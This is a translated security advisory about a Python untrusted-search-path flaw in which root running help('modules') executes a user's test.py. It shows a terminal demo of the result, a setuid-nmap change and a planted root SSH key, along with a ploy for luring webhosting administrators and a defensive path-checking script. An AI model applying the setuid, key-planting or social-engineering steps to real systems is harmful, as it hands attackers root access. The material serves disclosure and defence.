Latest Python privilege escalation: untrusted search path/code execution vulnerability in python-wrapper and python

Source: Internet
Author: User
Tags: webhosting

Exploit-db.com recently published an unusual vulnerability. If the root user can be induced to run the help('modules') command from the current directory in python or python-wrapper, the test.py script in that directory is executed in the background with root privileges.
/// adalia is an ordinary user. The following shows the permissions and contents of test.py. One line of the script is chmod 4755 /usr/bin/nmap, which sets nmap's mode to 4755 (setuid), so nmap runs with the permissions of its owner; that is, ordinary users can run nmap with root privileges.
/// The nmap permission is rwx:
adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap
-rwxr-xr-x 1 root 1.4M Oct 29 2011 /usr/bin/nmap
/// Before the attack, /root/.ssh/authorized_keys does not exist
bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys
ls: cannot access /root/.ssh/authorized_keys: No such file or directory
/// Attack start: run python on bukkit (as root)
adalia@bukkit:~/security/pythonwrapper> su
Password:
bukkit:/home/adalia/security/pythonwrapper # python
Python 2.7.2 (default, Aug 19 2011, 20:41:43) [GCC] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> help('modules')
Please wait a moment while I gather a list of all available modules...
... (module list omitted here) ...
>>> exit()
/// After the module listing, the nmap permission has changed to rws, so nmap now runs with the permissions of its owner. The /root/.ssh/authorized_keys file, which did not exist before, is now present.
bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap
-rwsr-xr-x 1 root 1.4M Oct 29 2011 /usr/bin/nmap
bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys
ssh-rsa rogueclown washere
The vulnerability's discoverer also describes a scenario for tricking the administrator into running help('modules'): in a webhosting environment, a user asks the administrator to help debug some modules and to list the modules installed in the webhosting environment. The user then waits until the administrator runs help('modules') from the user's directory.
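A check an administrator could run before starting an interpreter inside a user's directory, added here as an example (it is not code from the advisory or from Python itself): it flags search-path entries that an unprivileged user controls and lists files there that would shadow a module found later on the path. The function names, the trusted-uid default and the constructed directory layout in the demo are assumptions made for illustration.

```python
import importlib.machinery
import os
import stat
import tempfile

def risky_entries(search_path, cwd, trusted_uids=(0,)):
    """Map each search-path entry a non-trusted user could control to its reasons."""
    findings = {}
    for entry in search_path:
        reasons = []
        # '' (first entry in an interactive session) and relative entries follow the cwd.
        if not os.path.isabs(entry):
            reasons.append("resolves against the current directory")
        try:
            st = os.stat(os.path.join(cwd, entry))  # join keeps absolute entries as-is
            if st.st_uid not in trusted_uids:
                reasons.append("owned by uid %d" % st.st_uid)
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                reasons.append("group- or world-writable")
        except OSError:
            pass  # missing entry: nothing to own or write to
        if reasons:
            findings[entry] = reasons
    return findings

def shadowed_names(directory, later_entries):
    """Modules in `directory` that also exist in entries searched after it."""
    hits = []
    for fname in sorted(os.listdir(directory)):
        full = os.path.join(directory, fname)
        if fname.endswith(".py") and os.path.isfile(full):
            name = fname[:-3]
        elif os.path.isfile(os.path.join(full, "__init__.py")):
            name = fname
        else:
            continue
        # PathFinder.find_spec only locates the module; it never executes it.
        if name.isidentifier() and importlib.machinery.PathFinder.find_spec(name, later_entries):
            hits.append(name)
    return hits

if __name__ == "__main__":
    # Constructed layout: a user directory holding test.py, a library directory holding a `test` package.
    with tempfile.TemporaryDirectory() as root:
        user, lib = os.path.join(root, "user"), os.path.join(root, "lib")
        os.makedirs(os.path.join(lib, "test"))
        os.mkdir(user)
        for p in (os.path.join(user, "test.py"), os.path.join(lib, "test", "__init__.py")):
            open(p, "w").close()
        print(risky_entries(["", lib], cwd=user))
        print(shadowed_names(user, [lib]))
```

In real use, pass `sys.path` and `os.getcwd()` to `risky_entries`, and for each flagged directory pass the remaining entries of `sys.path` to `shadowed_names`.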
Affected versions: Python 2.7.2 and Python 3.2.1
Python untrusted search path/code execution vulnerability:
http://www.exploit-id.com/local-exploits/python-untrusted-search-pathcode-execution-vulnerability
Python-wrapper untrusted search path/code execution vulnerability:
http://www.exploit-db.com/exploits/19523/
 
From: FreeBuf.COM
